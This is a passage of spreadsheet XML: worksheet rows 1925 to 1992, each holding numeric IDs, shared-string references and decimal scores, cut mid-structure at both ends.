      <c r="C1925" s="2" t="s">
        <v>1763</v>
      </c>
      <c r="D1925" s="2">
        <v>1.0</v>
      </c>
      <c r="E1925" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1925" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="1926" ht="15.75" customHeight="1">
      <c r="A1926" s="1">
        <v>30886.0</v>
      </c>
      <c r="B1926" s="2">
        <v>4.6497953E7</v>
      </c>
      <c r="C1926" s="2" t="s">
        <v>1378</v>
      </c>
      <c r="D1926" s="2">
        <v>1.0</v>
      </c>
      <c r="E1926" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1926" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="1927" ht="15.75" customHeight="1">
      <c r="A1927" s="1">
        <v>34075.0</v>
      </c>
      <c r="B1927" s="2">
        <v>9664273.0</v>
      </c>
      <c r="C1927" s="2" t="s">
        <v>1764</v>
      </c>
      <c r="D1927" s="2">
        <v>1.0</v>
      </c>
      <c r="E1927" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1927" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="1928" ht="15.75" customHeight="1">
      <c r="A1928" s="1">
        <v>860.0</v>
      </c>
      <c r="B1928" s="2">
        <v>2.1764869E7</v>
      </c>
      <c r="C1928" s="2" t="s">
        <v>1765</v>
      </c>
      <c r="D1928" s="2">
        <v>1.0</v>
      </c>
      <c r="E1928" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1928" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="1929" ht="15.75" customHeight="1">
      <c r="A1929" s="1">
        <v>6291.0</v>
      </c>
      <c r="B1929" s="2">
        <v>4.8204072E7</v>
      </c>
      <c r="C1929" s="2" t="s">
        <v>1766</v>
      </c>
      <c r="D1929" s="2">
        <v>1.0</v>
      </c>
      <c r="E1929" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1929" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="1930" ht="15.75" customHeight="1">
      <c r="A1930" s="1">
        <v>6860.0</v>
      </c>
      <c r="B1930" s="2">
        <v>4.9677385E7</v>
      </c>
      <c r="C1930" s="2" t="s">
        <v>1767</v>
      </c>
      <c r="D1930" s="2">
        <v>1.0</v>
      </c>
      <c r="E1930" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1930" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="1931" ht="15.75" customHeight="1">
      <c r="A1931" s="1">
        <v>33031.0</v>
      </c>
      <c r="B1931" s="2">
        <v>6711922.0</v>
      </c>
      <c r="C1931" s="2" t="s">
        <v>1306</v>
      </c>
      <c r="D1931" s="2">
        <v>1.0</v>
      </c>
      <c r="E1931" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1931" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="1932" ht="15.75" customHeight="1">
      <c r="A1932" s="1">
        <v>33565.0</v>
      </c>
      <c r="B1932" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C1932" s="2" t="s">
        <v>1768</v>
      </c>
      <c r="D1932" s="2">
        <v>1.0</v>
      </c>
      <c r="E1932" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1932" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="1933" ht="15.75" customHeight="1">
      <c r="A1933" s="1">
        <v>4218.0</v>
      </c>
      <c r="B1933" s="2">
        <v>4.1720713E7</v>
      </c>
      <c r="C1933" s="2" t="s">
        <v>1769</v>
      </c>
      <c r="D1933" s="2">
        <v>1.0</v>
      </c>
      <c r="E1933" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1933" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="1934" ht="15.75" customHeight="1">
      <c r="A1934" s="1">
        <v>4380.0</v>
      </c>
      <c r="B1934" s="2">
        <v>4.215868E7</v>
      </c>
      <c r="C1934" s="5" t="s">
        <v>1770</v>
      </c>
      <c r="D1934" s="2">
        <v>1.0</v>
      </c>
      <c r="E1934" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1934" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="1935" ht="15.75" customHeight="1">
      <c r="A1935" s="1">
        <v>9386.0</v>
      </c>
      <c r="B1935" s="2">
        <v>5.5743263E7</v>
      </c>
      <c r="C1935" s="2" t="s">
        <v>1771</v>
      </c>
      <c r="D1935" s="2">
        <v>1.0</v>
      </c>
      <c r="E1935" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1935" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="1936" ht="15.75" customHeight="1">
      <c r="A1936" s="1">
        <v>27164.0</v>
      </c>
      <c r="B1936" s="2">
        <v>2.0824342E7</v>
      </c>
      <c r="C1936" s="2" t="s">
        <v>1772</v>
      </c>
      <c r="D1936" s="2">
        <v>1.0</v>
      </c>
      <c r="E1936" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1936" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="1937" ht="15.75" customHeight="1">
      <c r="A1937" s="1">
        <v>30475.0</v>
      </c>
      <c r="B1937" s="2">
        <v>3.9675278E7</v>
      </c>
      <c r="C1937" s="2" t="s">
        <v>1773</v>
      </c>
      <c r="D1937" s="2">
        <v>1.0</v>
      </c>
      <c r="E1937" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1937" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="1938" ht="15.75" customHeight="1">
      <c r="A1938" s="1">
        <v>24375.0</v>
      </c>
      <c r="B1938" s="2">
        <v>1.076539E7</v>
      </c>
      <c r="C1938" s="2" t="s">
        <v>1774</v>
      </c>
      <c r="D1938" s="2">
        <v>1.0</v>
      </c>
      <c r="E1938" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1938" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="1939" ht="15.75" customHeight="1">
      <c r="A1939" s="1">
        <v>29103.0</v>
      </c>
      <c r="B1939" s="2">
        <v>3.0423563E7</v>
      </c>
      <c r="C1939" s="2" t="s">
        <v>1628</v>
      </c>
      <c r="D1939" s="2">
        <v>1.0</v>
      </c>
      <c r="E1939" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1939" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="1940" ht="15.75" customHeight="1">
      <c r="A1940" s="1">
        <v>13379.0</v>
      </c>
      <c r="B1940" s="2">
        <v>3.4884241E7</v>
      </c>
      <c r="C1940" s="2" t="s">
        <v>1775</v>
      </c>
      <c r="D1940" s="2">
        <v>1.0</v>
      </c>
      <c r="E1940" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1940" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="1941" ht="15.75" customHeight="1">
      <c r="A1941" s="1">
        <v>28715.0</v>
      </c>
      <c r="B1941" s="2">
        <v>2.7843121E7</v>
      </c>
      <c r="C1941" s="2" t="s">
        <v>1640</v>
      </c>
      <c r="D1941" s="2">
        <v>1.0</v>
      </c>
      <c r="E1941" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1941" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="1942" ht="15.75" customHeight="1">
      <c r="A1942" s="1">
        <v>33851.0</v>
      </c>
      <c r="B1942" s="2">
        <v>9035563.0</v>
      </c>
      <c r="C1942" s="2" t="s">
        <v>1776</v>
      </c>
      <c r="D1942" s="2">
        <v>1.0</v>
      </c>
      <c r="E1942" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1942" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="1943" ht="15.75" customHeight="1">
      <c r="A1943" s="1">
        <v>1590.0</v>
      </c>
      <c r="B1943" s="2">
        <v>2.7746523E7</v>
      </c>
      <c r="C1943" s="2" t="s">
        <v>1777</v>
      </c>
      <c r="D1943" s="2">
        <v>1.0</v>
      </c>
      <c r="E1943" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1943" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1944" ht="15.75" customHeight="1">
      <c r="A1944" s="1">
        <v>3122.0</v>
      </c>
      <c r="B1944" s="2">
        <v>3.6836566E7</v>
      </c>
      <c r="C1944" s="2" t="s">
        <v>1778</v>
      </c>
      <c r="D1944" s="2">
        <v>1.0</v>
      </c>
      <c r="E1944" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1944" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1945" ht="15.75" customHeight="1">
      <c r="A1945" s="1">
        <v>4455.0</v>
      </c>
      <c r="B1945" s="2">
        <v>4.2410865E7</v>
      </c>
      <c r="C1945" s="2" t="s">
        <v>1779</v>
      </c>
      <c r="D1945" s="2">
        <v>1.0</v>
      </c>
      <c r="E1945" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1945" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1946" ht="15.75" customHeight="1">
      <c r="A1946" s="1">
        <v>4719.0</v>
      </c>
      <c r="B1946" s="2">
        <v>4.3316426E7</v>
      </c>
      <c r="C1946" s="2" t="s">
        <v>1780</v>
      </c>
      <c r="D1946" s="2">
        <v>1.0</v>
      </c>
      <c r="E1946" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1946" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1947" ht="15.75" customHeight="1">
      <c r="A1947" s="1">
        <v>7181.0</v>
      </c>
      <c r="B1947" s="2">
        <v>5.0564107E7</v>
      </c>
      <c r="C1947" s="2" t="s">
        <v>1781</v>
      </c>
      <c r="D1947" s="2">
        <v>1.0</v>
      </c>
      <c r="E1947" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1947" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1948" ht="15.75" customHeight="1">
      <c r="A1948" s="1">
        <v>10195.0</v>
      </c>
      <c r="B1948" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C1948" s="2" t="s">
        <v>1782</v>
      </c>
      <c r="D1948" s="2">
        <v>1.0</v>
      </c>
      <c r="E1948" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1948" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1949" ht="15.75" customHeight="1">
      <c r="A1949" s="1">
        <v>10716.0</v>
      </c>
      <c r="B1949" s="2">
        <v>1.5033573E7</v>
      </c>
      <c r="C1949" s="2" t="s">
        <v>1783</v>
      </c>
      <c r="D1949" s="2">
        <v>1.0</v>
      </c>
      <c r="E1949" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1949" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1950" ht="15.75" customHeight="1">
      <c r="A1950" s="1">
        <v>11023.0</v>
      </c>
      <c r="B1950" s="2">
        <v>1.7883689E7</v>
      </c>
      <c r="C1950" s="2" t="s">
        <v>1784</v>
      </c>
      <c r="D1950" s="2">
        <v>1.0</v>
      </c>
      <c r="E1950" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1950" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1951" ht="15.75" customHeight="1">
      <c r="A1951" s="1">
        <v>11382.0</v>
      </c>
      <c r="B1951" s="2">
        <v>2.1420184E7</v>
      </c>
      <c r="C1951" s="2" t="s">
        <v>1785</v>
      </c>
      <c r="D1951" s="2">
        <v>1.0</v>
      </c>
      <c r="E1951" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1951" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1952" ht="15.75" customHeight="1">
      <c r="A1952" s="1">
        <v>11490.0</v>
      </c>
      <c r="B1952" s="2">
        <v>2.2055908E7</v>
      </c>
      <c r="C1952" s="2" t="s">
        <v>1786</v>
      </c>
      <c r="D1952" s="2">
        <v>1.0</v>
      </c>
      <c r="E1952" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1952" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1953" ht="15.75" customHeight="1">
      <c r="A1953" s="1">
        <v>12089.0</v>
      </c>
      <c r="B1953" s="2">
        <v>2.6706477E7</v>
      </c>
      <c r="C1953" s="2" t="s">
        <v>1787</v>
      </c>
      <c r="D1953" s="2">
        <v>1.0</v>
      </c>
      <c r="E1953" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1953" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1954" ht="15.75" customHeight="1">
      <c r="A1954" s="1">
        <v>12462.0</v>
      </c>
      <c r="B1954" s="2">
        <v>2.93855E7</v>
      </c>
      <c r="C1954" s="2" t="s">
        <v>1788</v>
      </c>
      <c r="D1954" s="2">
        <v>1.0</v>
      </c>
      <c r="E1954" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1954" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1955" ht="15.75" customHeight="1">
      <c r="A1955" s="1">
        <v>12692.0</v>
      </c>
      <c r="B1955" s="2">
        <v>3.073141E7</v>
      </c>
      <c r="C1955" s="2" t="s">
        <v>1789</v>
      </c>
      <c r="D1955" s="2">
        <v>1.0</v>
      </c>
      <c r="E1955" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1955" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1956" ht="15.75" customHeight="1">
      <c r="A1956" s="1">
        <v>13118.0</v>
      </c>
      <c r="B1956" s="2">
        <v>3.3599117E7</v>
      </c>
      <c r="C1956" s="2" t="s">
        <v>1790</v>
      </c>
      <c r="D1956" s="2">
        <v>1.0</v>
      </c>
      <c r="E1956" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1956" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1957" ht="15.75" customHeight="1">
      <c r="A1957" s="1">
        <v>13401.0</v>
      </c>
      <c r="B1957" s="2">
        <v>3.4990126E7</v>
      </c>
      <c r="C1957" s="2" t="s">
        <v>1791</v>
      </c>
      <c r="D1957" s="2">
        <v>1.0</v>
      </c>
      <c r="E1957" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1957" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1958" ht="15.75" customHeight="1">
      <c r="A1958" s="1">
        <v>14121.0</v>
      </c>
      <c r="B1958" s="2">
        <v>3.7804255E7</v>
      </c>
      <c r="C1958" s="2" t="s">
        <v>1792</v>
      </c>
      <c r="D1958" s="2">
        <v>1.0</v>
      </c>
      <c r="E1958" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1958" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1959" ht="15.75" customHeight="1">
      <c r="A1959" s="1">
        <v>14144.0</v>
      </c>
      <c r="B1959" s="2">
        <v>3.7953766E7</v>
      </c>
      <c r="C1959" s="2" t="s">
        <v>1793</v>
      </c>
      <c r="D1959" s="2">
        <v>1.0</v>
      </c>
      <c r="E1959" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1959" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1960" ht="15.75" customHeight="1">
      <c r="A1960" s="1">
        <v>15170.0</v>
      </c>
      <c r="B1960" s="2">
        <v>4.2005878E7</v>
      </c>
      <c r="C1960" s="2" t="s">
        <v>1794</v>
      </c>
      <c r="D1960" s="2">
        <v>1.0</v>
      </c>
      <c r="E1960" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1960" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1961" ht="15.75" customHeight="1">
      <c r="A1961" s="1">
        <v>15731.0</v>
      </c>
      <c r="B1961" s="2">
        <v>4.4062586E7</v>
      </c>
      <c r="C1961" s="2" t="s">
        <v>1795</v>
      </c>
      <c r="D1961" s="2">
        <v>1.0</v>
      </c>
      <c r="E1961" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1961" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1962" ht="15.75" customHeight="1">
      <c r="A1962" s="1">
        <v>15901.0</v>
      </c>
      <c r="B1962" s="2">
        <v>4.4608488E7</v>
      </c>
      <c r="C1962" s="2" t="s">
        <v>1796</v>
      </c>
      <c r="D1962" s="2">
        <v>1.0</v>
      </c>
      <c r="E1962" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1962" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1963" ht="15.75" customHeight="1">
      <c r="A1963" s="1">
        <v>15947.0</v>
      </c>
      <c r="B1963" s="2">
        <v>4.4750077E7</v>
      </c>
      <c r="C1963" s="2" t="s">
        <v>1797</v>
      </c>
      <c r="D1963" s="2">
        <v>1.0</v>
      </c>
      <c r="E1963" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1963" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1964" ht="15.75" customHeight="1">
      <c r="A1964" s="1">
        <v>16784.0</v>
      </c>
      <c r="B1964" s="2">
        <v>4.7737286E7</v>
      </c>
      <c r="C1964" s="2" t="s">
        <v>1798</v>
      </c>
      <c r="D1964" s="2">
        <v>1.0</v>
      </c>
      <c r="E1964" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1964" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1965" ht="15.75" customHeight="1">
      <c r="A1965" s="1">
        <v>17007.0</v>
      </c>
      <c r="B1965" s="2">
        <v>4.8425975E7</v>
      </c>
      <c r="C1965" s="2" t="s">
        <v>1799</v>
      </c>
      <c r="D1965" s="2">
        <v>1.0</v>
      </c>
      <c r="E1965" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1965" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1966" ht="15.75" customHeight="1">
      <c r="A1966" s="1">
        <v>17015.0</v>
      </c>
      <c r="B1966" s="2">
        <v>4.8438498E7</v>
      </c>
      <c r="C1966" s="2" t="s">
        <v>1800</v>
      </c>
      <c r="D1966" s="2">
        <v>1.0</v>
      </c>
      <c r="E1966" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1966" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1967" ht="15.75" customHeight="1">
      <c r="A1967" s="1">
        <v>17397.0</v>
      </c>
      <c r="B1967" s="2">
        <v>4.9624588E7</v>
      </c>
      <c r="C1967" s="2" t="s">
        <v>1801</v>
      </c>
      <c r="D1967" s="2">
        <v>1.0</v>
      </c>
      <c r="E1967" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1967" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1968" ht="15.75" customHeight="1">
      <c r="A1968" s="1">
        <v>17512.0</v>
      </c>
      <c r="B1968" s="2">
        <v>5.0018021E7</v>
      </c>
      <c r="C1968" s="2" t="s">
        <v>1802</v>
      </c>
      <c r="D1968" s="2">
        <v>1.0</v>
      </c>
      <c r="E1968" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1968" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1969" ht="15.75" customHeight="1">
      <c r="A1969" s="1">
        <v>17573.0</v>
      </c>
      <c r="B1969" s="2">
        <v>5.0262712E7</v>
      </c>
      <c r="C1969" s="2" t="s">
        <v>1803</v>
      </c>
      <c r="D1969" s="2">
        <v>1.0</v>
      </c>
      <c r="E1969" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1969" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1970" ht="15.75" customHeight="1">
      <c r="A1970" s="1">
        <v>17817.0</v>
      </c>
      <c r="B1970" s="2">
        <v>5.0905824E7</v>
      </c>
      <c r="C1970" s="2" t="s">
        <v>1804</v>
      </c>
      <c r="D1970" s="2">
        <v>1.0</v>
      </c>
      <c r="E1970" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1970" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1971" ht="15.75" customHeight="1">
      <c r="A1971" s="1">
        <v>18342.0</v>
      </c>
      <c r="B1971" s="2">
        <v>5.244145E7</v>
      </c>
      <c r="C1971" s="2" t="s">
        <v>1805</v>
      </c>
      <c r="D1971" s="2">
        <v>1.0</v>
      </c>
      <c r="E1971" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1971" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1972" ht="15.75" customHeight="1">
      <c r="A1972" s="1">
        <v>18774.0</v>
      </c>
      <c r="B1972" s="2">
        <v>5.3789958E7</v>
      </c>
      <c r="C1972" s="2" t="s">
        <v>1806</v>
      </c>
      <c r="D1972" s="2">
        <v>1.0</v>
      </c>
      <c r="E1972" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1972" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1973" ht="15.75" customHeight="1">
      <c r="A1973" s="1">
        <v>19421.0</v>
      </c>
      <c r="B1973" s="2">
        <v>5.5636692E7</v>
      </c>
      <c r="C1973" s="2" t="s">
        <v>1807</v>
      </c>
      <c r="D1973" s="2">
        <v>1.0</v>
      </c>
      <c r="E1973" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1973" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1974" ht="15.75" customHeight="1">
      <c r="A1974" s="1">
        <v>19864.0</v>
      </c>
      <c r="B1974" s="2">
        <v>5.7163508E7</v>
      </c>
      <c r="C1974" s="2" t="s">
        <v>1808</v>
      </c>
      <c r="D1974" s="2">
        <v>1.0</v>
      </c>
      <c r="E1974" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1974" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1975" ht="15.75" customHeight="1">
      <c r="A1975" s="1">
        <v>20163.0</v>
      </c>
      <c r="B1975" s="2">
        <v>1.0321236E7</v>
      </c>
      <c r="C1975" s="2" t="s">
        <v>1809</v>
      </c>
      <c r="D1975" s="2">
        <v>1.0</v>
      </c>
      <c r="E1975" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1975" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1976" ht="15.75" customHeight="1">
      <c r="A1976" s="1">
        <v>21252.0</v>
      </c>
      <c r="B1976" s="2">
        <v>2.0013878E7</v>
      </c>
      <c r="C1976" s="2" t="s">
        <v>1810</v>
      </c>
      <c r="D1976" s="2">
        <v>1.0</v>
      </c>
      <c r="E1976" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1976" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1977" ht="15.75" customHeight="1">
      <c r="A1977" s="1">
        <v>21433.0</v>
      </c>
      <c r="B1977" s="2">
        <v>2.2167348E7</v>
      </c>
      <c r="C1977" s="2" t="s">
        <v>1811</v>
      </c>
      <c r="D1977" s="2">
        <v>1.0</v>
      </c>
      <c r="E1977" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1977" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1978" ht="15.75" customHeight="1">
      <c r="A1978" s="1">
        <v>21666.0</v>
      </c>
      <c r="B1978" s="2">
        <v>2.5006891E7</v>
      </c>
      <c r="C1978" s="2" t="s">
        <v>1812</v>
      </c>
      <c r="D1978" s="2">
        <v>1.0</v>
      </c>
      <c r="E1978" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1978" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1979" ht="15.75" customHeight="1">
      <c r="A1979" s="1">
        <v>22599.0</v>
      </c>
      <c r="B1979" s="2">
        <v>3.9475106E7</v>
      </c>
      <c r="C1979" s="2" t="s">
        <v>1813</v>
      </c>
      <c r="D1979" s="2">
        <v>1.0</v>
      </c>
      <c r="E1979" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1979" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1980" ht="15.75" customHeight="1">
      <c r="A1980" s="1">
        <v>22642.0</v>
      </c>
      <c r="B1980" s="2">
        <v>4.0678165E7</v>
      </c>
      <c r="C1980" s="2" t="s">
        <v>1814</v>
      </c>
      <c r="D1980" s="2">
        <v>1.0</v>
      </c>
      <c r="E1980" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1980" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1981" ht="15.75" customHeight="1">
      <c r="A1981" s="1">
        <v>22866.0</v>
      </c>
      <c r="B1981" s="2">
        <v>4.7388957E7</v>
      </c>
      <c r="C1981" s="2" t="s">
        <v>1815</v>
      </c>
      <c r="D1981" s="2">
        <v>1.0</v>
      </c>
      <c r="E1981" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1981" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1982" ht="15.75" customHeight="1">
      <c r="A1982" s="1">
        <v>22913.0</v>
      </c>
      <c r="B1982" s="2">
        <v>4.8294823E7</v>
      </c>
      <c r="C1982" s="2" t="s">
        <v>1816</v>
      </c>
      <c r="D1982" s="2">
        <v>1.0</v>
      </c>
      <c r="E1982" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1982" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1983" ht="15.75" customHeight="1">
      <c r="A1983" s="1">
        <v>23028.0</v>
      </c>
      <c r="B1983" s="2">
        <v>4.9992929E7</v>
      </c>
      <c r="C1983" s="2" t="s">
        <v>1817</v>
      </c>
      <c r="D1983" s="2">
        <v>1.0</v>
      </c>
      <c r="E1983" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1983" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1984" ht="15.75" customHeight="1">
      <c r="A1984" s="1">
        <v>23029.0</v>
      </c>
      <c r="B1984" s="2">
        <v>5.0028043E7</v>
      </c>
      <c r="C1984" s="2" t="s">
        <v>1818</v>
      </c>
      <c r="D1984" s="2">
        <v>1.0</v>
      </c>
      <c r="E1984" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1984" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1985" ht="15.75" customHeight="1">
      <c r="A1985" s="1">
        <v>23372.0</v>
      </c>
      <c r="B1985" s="2">
        <v>5.527925E7</v>
      </c>
      <c r="C1985" s="2" t="s">
        <v>1819</v>
      </c>
      <c r="D1985" s="2">
        <v>1.0</v>
      </c>
      <c r="E1985" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1985" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1986" ht="15.75" customHeight="1">
      <c r="A1986" s="1">
        <v>24154.0</v>
      </c>
      <c r="B1986" s="2">
        <v>1.0093249E7</v>
      </c>
      <c r="C1986" s="2" t="s">
        <v>1820</v>
      </c>
      <c r="D1986" s="2">
        <v>1.0</v>
      </c>
      <c r="E1986" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1986" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1987" ht="15.75" customHeight="1">
      <c r="A1987" s="1">
        <v>24329.0</v>
      </c>
      <c r="B1987" s="2">
        <v>1.0671858E7</v>
      </c>
      <c r="C1987" s="2" t="s">
        <v>1821</v>
      </c>
      <c r="D1987" s="2">
        <v>1.0</v>
      </c>
      <c r="E1987" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1987" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1988" ht="15.75" customHeight="1">
      <c r="A1988" s="1">
        <v>24348.0</v>
      </c>
      <c r="B1988" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C1988" s="2" t="s">
        <v>1822</v>
      </c>
      <c r="D1988" s="2">
        <v>1.0</v>
      </c>
      <c r="E1988" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1988" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1989" ht="15.75" customHeight="1">
      <c r="A1989" s="1">
        <v>24751.0</v>
      </c>
      <c r="B1989" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C1989" s="2" t="s">
        <v>1823</v>
      </c>
      <c r="D1989" s="2">
        <v>1.0</v>
      </c>
      <c r="E1989" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1989" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1990" ht="15.75" customHeight="1">
      <c r="A1990" s="1">
        <v>24954.0</v>
      </c>
      <c r="B1990" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C1990" s="2" t="s">
        <v>1824</v>
      </c>
      <c r="D1990" s="2">
        <v>1.0</v>
      </c>
      <c r="E1990" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1990" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1991" ht="15.75" customHeight="1">
      <c r="A1991" s="1">
        <v>24959.0</v>
      </c>
      <c r="B1991" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C1991" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="D1991" s="2">
        <v>1.0</v>
      </c>
      <c r="E1991" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1991" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="1992" ht="15.75" customHeight="1">
      <c r="A1992" s="1">
        <v>25007.0</v>
      </c>
      <c r="B1992" s="2">
        <v>1.2723496E7</v>
      </c>
      <c r="C1992" s="2" t="s">
        <v>1826</v>
      </c>
      <c r="D1992" s="2">
        <v>1.0</v>
      </c>
      <c r="E1992" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F1992" s="2">
        <v>0.108187134502924</v>
      </c>
